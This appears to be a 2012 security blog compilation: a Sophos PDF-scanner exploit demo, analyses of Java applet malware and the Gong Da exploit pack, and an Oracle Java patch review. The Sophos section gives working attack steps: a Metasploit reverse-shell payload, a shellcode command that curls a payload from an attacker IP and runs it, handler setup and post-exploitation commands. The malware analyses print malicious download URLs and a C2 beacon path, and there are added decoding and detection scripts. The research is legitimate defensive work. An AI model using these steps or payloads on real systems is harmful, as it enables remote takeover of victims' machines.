Sophos Anti-Virus Sophail PDF Vulnerability Metasploit Payload Demo

Timeline:

Vulnerabilities reported to the vendor by Tavis Ormandy on 2012-09-10
Public release of the vulnerabilities by Tavis Ormandy on 2012-11-05
PoC provided by Tavis Ormandy on 2012-10-02

PoC provided by:

Tavis Ormandy

Reference(s):

Full Disclosure
Sophail: Applied attacks against Sophos Antivirus
Sophos products and Tavis Ormandy
VU#662243

Affected version(s):

Sophos products for Mac OS X
Sophos products for Windows
Sophos products for Linux

Tested on Mac OS X 10.8.2 with:

Sophos Anti-Virus for Mac Home Edition

Description:

This PoC demonstrates one of the Sophos product vulnerabilities reported by Tavis Ormandy. It exploits a PDF stack buffer overflow present in the Sophos on-access scanner.

Demo:

1) Create a Mac OS X Metasploit payload:

msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > mac_os_x_payload

2) Modify Sophail shellcode.asm file with, for example:

.command: db "curl -s http://192.168.178.26/mac_os_x_payload > mac_os_x_payload | chmod u+x mac_os_x_payload && ./mac_os_x_payload", 0

3) Make

4) Upload index.html, exploit.bin and exploit.png on a web server

5) Initiate a Metasploit multi/handler:

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

6) On the target, browse to the index.html file

7) Exploit the session :)

sessions -i 1
id
/sbin/ifconfig
uname -a

Funny and Efficient Anti-Virus Bypass Packed Java Applets Exploits CVE-2012-4681 in the Wild

On 24 October, during my regular malware monitoring hobby, I observed a suspicious infected server in Taiwan (www.grvb.com.tw) which is actually still online. The home page of the server loads a first Java Applet from a JAR file “Java.jar” and a second Java Applet as a single class file “eiAD.class”.

VirusTotal analysis of “Java.jar” (2990711e7cd04553260a6fbccf8ea6a6) reported 5/43 detections as Java/Downloader, and analysis of “eiAD.class” (8d4ddd1e1f41a2e8e18da097ecafecbc) reported 5/44 detections as CVE-2012-4681 Oracle Java Gondvv exploit. The detection rate is really low, so a deeper analysis of these elements is interesting.

Thanks to @_sinn3r, @binjo, @jjarmoc and @maxime_tz for all their advice.

“Java.jar” (pastebin source code) JAR Java/Downloader analysis

This JAR file contains a Manifest file which reveals that it was compiled with “Java 1.6.0_29 (Sun Microsystems Inc.)”, and the JAR file is signed with an RSA signature.

You can see this self-signed certificate was created on 16 October and pretends to be generated by Microsoft and issued by Microsoft. By signing an applet, most of the restrictions on the applet are removed. Signing an applet basically means that the applet writer vouches that the applet is safe. The user of a signed applet can accept it and have it run without most restrictions, or reject it and not have it run at all. A self-signed applet triggers a security warning pop-up advising of the associated risks. A similar self-signed Java Applet could be generated with the java_signed_applet Metasploit exploit module.

By analyzing the source code of “Java.jar”, we can see interesting arrays and functions.

“FCKME” is an array where a space represents a new entry. The guys don’t seem to like ESET, the anti-virus editor of NOD32 🙂

An encoded string is present and is decoded by the adjacent “FJKOKL” function. You can see that the value at index 29 of the “FCKME” array is used to complete the encoded text.

This function removes all the “[>|<]” values from the encoded text, with the following result:

“687474703a2f2f7777772e677672622e636f6d2e74772f75706c6f61642f757365722f66696c65732f6e756d”.

The string is hex-encoded; after decoding you get the following result, completed with “FCKME[29]”, which is “.exe”:

“http://www.gvrb.com.tw/upload/user/files/num.exe” (this file no longer exists)

The following table provides all values of the “FCKME” array.

With all these values we are able to decode every “FCKME” variable used in the “Java.jar” code.

As you can see, Java.jar is only a self-signed Java downloader. Finally, as pointed out by @_sinn3r, this Applet is surely used as a plan B, if eiAD.class is not triggered.

“eiAD.class” (pastebin source code) CVE-2012-4681 Java class file analysis

By analyzing the source code of “eiAD.class”, we can see interesting arrays and functions.

This variable seems to be one more reference to the ESET anti-virus editor and especially to the “Foxxy Software Outfoxed” blog post (thanks to @binjo).

An encoded string is present and is decoded by the adjacent “FJKOKL” function, also used in “Java.jar”. A space represents a new entry in the “JFI” array.

“FJKOKL” removes all the “[>|<]” values from the encoded text, leaving a hex string.


The string is hex-encoded; after decoding you get the following result:

“Nothing like sun. being a awt. Sometimes I put my SunToolkit in my asshole! You see the get is a Field that Name for .exe okay // I mean god damn the get is being set for the Security Manager for file:/ ! Got damn I want some milk from my mommies titz for that acc”.
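The “FJKOKL” routine described for both “Java.jar” and “eiAD.class” is a two-step decoder: strip filler characters, then hex-decode, optionally appending an entry from a space-separated string array (“FCKME[29]” in the JAR case). The following Python is an added analyst's re-implementation, not code from the applets or from the original post. It assumes the “[>|<]” pattern is a regex character class (the characters `>`, `|` and `<`), which is how Java's `String.replaceAll` would read it; the obfuscated sample string and the stand-in “FCKME” array are constructed so that the decoded URL matches the one quoted above.

```python
import re

# Constructed sample: the hex string quoted in the article, padded with the
# filler characters '>', '|' and '<' the way the applet's payload is described.
OBFUSCATED_URL = (
    "68>74|74<70>3a|2f<2f>77|77<77>2e|67<76>72|62<2e>63|6f<6d>2e|74<77>"
    "2f|75<70>6c|6f<61>64|2f<75>73|65<72>2f|66<69>6c|65<73>2f|6e<75>6d"
)

# Constructed stand-in for the space-separated "FCKME" string array: only
# index 29 (".exe") is used for the URL, so earlier entries are placeholders.
FCKME_RAW = " ".join(["x"] * 29 + [".exe"])

FILLER = re.compile(r"[>|<]")          # assumption: regex character class
HEX_ONLY = re.compile(r"[0-9a-fA-F]*")


def split_array(raw):
    """Rebuild an obfuscated string array where a space starts a new entry."""
    return raw.split(" ")


def strip_filler(text):
    """FJKOKL step 1: remove every filler character from the encoded text."""
    return FILLER.sub("", text)


def hex_decode(hex_text):
    """FJKOKL step 2: hex -> bytes -> text; refuse input that is not clean hex."""
    if len(hex_text) % 2 or not HEX_ONLY.fullmatch(hex_text):
        raise ValueError("not a clean hex string after stripping filler")
    return bytes.fromhex(hex_text).decode("latin-1")


def is_decodable(text):
    """True when the stripped text is valid hex (useful when triaging strings)."""
    try:
        hex_decode(strip_filler(text))
        return True
    except ValueError:
        return False


def decode_download_url(obfuscated, array_raw, suffix_index):
    """Recover the downloader URL: strip, hex-decode, append array[suffix_index]."""
    table = split_array(array_raw)
    return hex_decode(strip_filler(obfuscated)) + table[suffix_index]


if __name__ == "__main__":
    print(decode_download_url(OBFUSCATED_URL, FCKME_RAW, 29))
```

The same `strip_filler` / `hex_decode` pair decodes the “JFI” strings of “eiAD.class”; only the array and the optional suffix differ.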

The following table provides all values of the “JFI” array.

With all these values we are able to decode every “JFI” variable used in the “Java.jar” code.

With all these variables and other functions, the code is able to reconstruct the CVE-2012-4681 Oracle Java exploit.

Another encoded string is present in “eiAD.class”, and it decodes to the same result as in “Java.jar”:

“http://www.gvrb.com.tw/upload/user/files/num.exe” (this file no longer exists)

I found an occurrence of the Author variable in “lEZdLl.class” on pastebin, posted by a Guest on 24 September, which is equivalent to “eiAD.class”.

The “HGIDO” value of “lEZdLl.class” is “http://212.150.101.32/Facebook_msn.exe” (this file no longer exists).

Below is a demonstration video of the effectiveness of these files against anti-viruses.

Gong Da / Gondad Exploit Pack Evolutions

You may remember the end-of-August Java 0day, aka CVE-2012-4681. This 0day was found in an HTML page containing obfuscated JavaScript. The obfuscation was made by a tool initially called “Dadong’s JS Obfuscator”:

/*Encrypt By Dadong’s JSXX 0.44 VIP*/

This obfuscator was used, in the Java 0day case, to hide the presence of the Chinese Gong Da Pack (aka Gondad).

The August version of Gong Da Pack exploited CVE-2012-4681, as shown in the following diagram, but previous studies, in March, revealed that this Pack also dealt with CVE-2011-2140 (Adobe Flash Player), CVE-2012-0003 (Windows Multimedia Library) and CVE-2011-3544 (Oracle Java Rhino exploit).

A new version of Gong Da Pack is emerging and is getting more complex. This version was discovered on “hxxp://qq.wangmazz.com/xx/index.html”, a web site which is no longer accessible.

“qq.wangmazz.com” was hosted on 210.56.55.106, AS38197, in Hong Kong, and the “wangmazz.com” domain name was created on 2012-10-19, through the name.com registrar, for “jie jiu ([email protected])”.

The “index.html” file contained JavaScript code obfuscated by the same obfuscator as for the Java 0day, but with a different name. I think we could simply rename “Dadong’s JS Obfuscator” to “JSXX VIP JS Obfuscator”. It seems that “Dadong’s” or “xx.xiamaqq.com” are the names of the campaigns. The “index.html” file was recognized by only 9 of 44 anti-viruses on VirusTotal.com:

/*Encrypt By xx.xiamaqq.com’s JSXX 0.44 VIP*/

After de-obfuscation of the “index.html” file, you can see that Gong Da Pack has evolved to the following diagram.

Gong Da Pack still deals with CVE-2011-3544 (Oracle Java Rhino exploit) and CVE-2012-4681 (Oracle Java August 0day), has added CVE-2012-0507 (another Oracle Java exploit), CVE-2012-1723 (another Oracle Java exploit) and CVE-2012-1889 (Microsoft XML Core Services), but has removed CVE-2011-2140 (Adobe Flash Player) and CVE-2012-0003 (Windows Multimedia Library) for this campaign.

An interesting part discovered in the code is that the bad guys were trying to target Internet Explorer browsers with Korean language support for CVE-2012-1889.

Here is some information regarding the different files:

“qaz2.exe”, a PE32 executable, is recognized by 23/44 anti-viruses as a trojan targeting online gamers. This file is downloaded from “xx.xiamaqq.com”, located on 210.56.55.161, AS38197, in Hong Kong. The “xiamaqq.com” domain name was also created on 2012-10-19, through the name.com registrar, for “jie jiu ([email protected])”.

Once installed, “qaz2.exe” connects to “o108.cvnieksff.com” on 111.68.8.254, in Hong Kong. The “cvnieksff.com” domain name was created on 2012-05-11, through the enom.com registrar, for “Yu Yuming ([email protected])”. The first connection is an HTTP GET to “/jc/post.asp?d10=MACADDRESS&d11=ver-jc-119xx&d21=56&d22=OSTYPE”. The response to this request is:
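The check-in request above has a stable shape (the `/jc/post.asp` path, the four `d10`..`d22` parameters, a `ver-jc-` version tag) that a proxy-log review can key on even when the C2 host changes. The following Python is an added detection example written for this post, not code from the original article; the proxy log lines are constructed, the C2 hostname comes from the article, and the field layout of the log (`client method url status`) is an assumption about the log source.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines (not from the article): "client method url status".
SAMPLE_PROXY_LOG = """\
10.0.0.12 GET http://o108.cvnieksff.com/jc/post.asp?d10=00-11-22-33-44-55&d11=ver-jc-119xx&d21=56&d22=WinXP 200
10.0.0.15 GET http://www.example.com/index.html 200
10.0.0.17 GET http://203.0.113.9/jc/post.asp?d10=AA-BB-CC-DD-EE-FF&d11=ver-jc-120aa&d21=56&d22=Win7 200
10.0.0.18 GET http://203.0.113.9/jc/post.asp?d10=x 200
"""

BEACON_PATH = "/jc/post.asp"                     # from the article
REQUIRED_PARAMS = {"d10", "d11", "d21", "d22"}   # from the article
VERSION_PREFIX = "ver-jc-"                       # from the article
KNOWN_C2_HOSTS = {"o108.cvnieksff.com"}          # from the article


def is_gongda_beacon(url):
    """Match the qaz2.exe check-in shape: path, the four d-parameters, version tag."""
    parts = urlsplit(url)
    if parts.path.lower() != BEACON_PATH:
        return False
    params = parse_qs(parts.query)
    if not REQUIRED_PARAMS.issubset(params):
        return False
    return params["d11"][0].startswith(VERSION_PREFIX)


def scan_proxy_log(text):
    """Return (client, host, reason) for each request worth an analyst's attention."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue                               # malformed line, skip
        client, url = fields[0], fields[2]
        host = urlsplit(url).hostname or ""
        if host in KNOWN_C2_HOSTS:
            hits.append((client, host, "known C2 host"))
        elif is_gongda_beacon(url):
            hits.append((client, host, "beacon pattern"))
    return hits


if __name__ == "__main__":
    for client, host, reason in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{client} -> {host}: {reason}")
```

The pattern match is deliberately stricter than the path alone, so a request to `/jc/post.asp` without the full parameter set (the last sample line) is not flagged; tune `REQUIRED_PARAMS` if the operators change the beacon.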

In conclusion, Gong Da Pack (aka Gondad) seems to continue targeting Asian countries and has evolved to mostly use the latest Oracle Java exploits. As you can see, this campaign targeted online gamers; what is still not clear is when and how the August Java 0day was pushed into Gong Da Pack.

Oracle Java Critical Patch Update October 2012 Review

Oracle has provided its Java Critical Patch Update (CPU) for October 2012, released on Tuesday, October 16. This CPU contains 30 security vulnerability fixes and concerns the “Java Runtime Environment” and “JavaFX” components. All 30 security vulnerabilities may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0, and 15 vulnerabilities have a CVSS base score greater than or equal to 7.0.

As you may know, Oracle uses CVSS 2.0 (Common Vulnerability Scoring System) to score the reported vulnerabilities. But as you also may know, security researchers disagree with Oracle’s usage of CVSS. Oracle plays with the CVSS score by creating a “Partial+” impact rating which does not exist in CVSS 2.0, and by interpreting the “Complete” rating in a different way than defined in CVSS 2.0.
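To make the “Partial+” point concrete, the following Python is an added example (not code from the original post, and not an Oracle tool) that implements the published CVSS 2.0 base score equation with its standard metric weights. The vectors fed to it are constructed by me to reproduce score values that appear in this CPU (10.0, 7.6, 7.5, 6.4, 5.8, 5.0, 2.6, 0.0); Oracle's advisory does not publish vectors, so they are illustrations, not the real metrics of any listed CVE. A vector carrying “P+” is rejected because that value simply does not exist in the standard.

```python
import math

# CVSS 2.0 base metric weights, as published in the CVSS v2 specification.
ACCESS_VECTOR = {"L": 0.395, "A": 0.646, "N": 1.0}
ACCESS_COMPLEXITY = {"H": 0.35, "M": 0.61, "L": 0.71}
AUTHENTICATION = {"M": 0.45, "S": 0.56, "N": 0.704}
IMPACT = {"N": 0.0, "P": 0.275, "C": 0.660}   # no "Partial+" (P+) exists here

# Constructed vectors chosen to land on scores present in the October 2012 CPU.
EXAMPLE_VECTORS = {
    "AV:N/AC:L/Au:N/C:C/I:C/A:C": 10.0,
    "AV:N/AC:H/Au:N/C:C/I:C/A:C": 7.6,
    "AV:N/AC:L/Au:N/C:P/I:P/A:P": 7.5,
    "AV:N/AC:L/Au:N/C:P/I:P/A:N": 6.4,
    "AV:N/AC:M/Au:N/C:P/I:P/A:N": 5.8,
    "AV:N/AC:L/Au:N/C:P/I:N/A:N": 5.0,
    "AV:N/AC:H/Au:N/C:P/I:N/A:N": 2.6,
    "AV:N/AC:L/Au:N/C:N/I:N/A:N": 0.0,
}


def parse_vector(vector):
    """Split 'AV:N/AC:L/...' into a metric -> value dict (values not yet validated)."""
    return dict(part.split(":", 1) for part in vector.split("/"))


def cvss2_base_score(vector):
    """Compute the CVSS 2.0 base score; raise ValueError on non-standard metric values."""
    m = parse_vector(vector)
    try:
        av, ac, au = ACCESS_VECTOR[m["AV"]], ACCESS_COMPLEXITY[m["AC"]], AUTHENTICATION[m["Au"]]
        c, i, a = IMPACT[m["C"]], IMPACT[m["I"]], IMPACT[m["A"]]
    except KeyError as exc:
        raise ValueError(f"not a CVSS 2.0 metric value: {exc}") from None
    impact = 10.41 * (1 - (1 - c) * (1 - i) * (1 - a))
    exploitability = 20 * av * ac * au
    f_impact = 0 if impact == 0 else 1.176
    raw = ((0.6 * impact) + (0.4 * exploitability) - 1.5) * f_impact
    return math.floor(raw * 10 + 0.5) / 10        # round half up to one decimal


def is_valid_cvss2_vector(vector):
    """True only when every metric value is one the CVSS 2.0 standard defines."""
    try:
        cvss2_base_score(vector)
        return True
    except (ValueError, KeyError):
        return False


if __name__ == "__main__":
    for vec, expected in EXAMPLE_VECTORS.items():
        print(f"{vec} -> {cvss2_base_score(vec)} (expected {expected})")
    print("P+ accepted:", is_valid_cvss2_vector("AV:N/AC:L/Au:N/C:P+/I:P+/A:P+"))
```

The 10.0 vector is the only way to reach the top score under the standard weights (network, low complexity, no authentication, complete loss of all three impacts), which is why a vendor-defined intermediate rating such as “Partial+” cannot be mapped onto the formula without leaving the specification.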

Affected products are:

  • JDK and JRE 7 Update 7 and earlier
  • JDK and JRE 6 Update 35 and earlier
  • JDK and JRE 5.0 Update 36 and earlier
  • SDK and JRE 1.4.2_38 and earlier
  • JavaFX 2.2 and earlier

  • CVE-2012-5083, CVE-2012-1531, CVE-2012-5086, CVE-2012-5087, CVE-2012-1533, CVE-2012-1532, CVE-2012-5076, CVE-2012-3143, CVE-2012-5088 and CVE-2012-5078 have a CVSS base score of 10.0
  • CVE-2012-5089, CVE-2012-5084 and CVE-2012-5080 have a CVSS base score of 7.6
  • CVE-2012-3159 and CVE-2012-5068 have a CVSS base score of 7.5
  • CVE-2012-4416, CVE-2012-5074 and CVE-2012-5071 have a CVSS base score of 6.4
  • CVE-2012-5069 has a CVSS base score of 5.8
  • CVE-2012-5067, CVE-2012-5070, CVE-2012-5075, CVE-2012-5073, CVE-2012-5079, CVE-2012-5072, CVE-2012-5081 and CVE-2012-5082 have a CVSS base score of 5.0
  • CVE-2012-3216 and CVE-2012-5077 have a CVSS base score of 2.6
  • CVE-2012-5085 has a CVSS base score of 0.0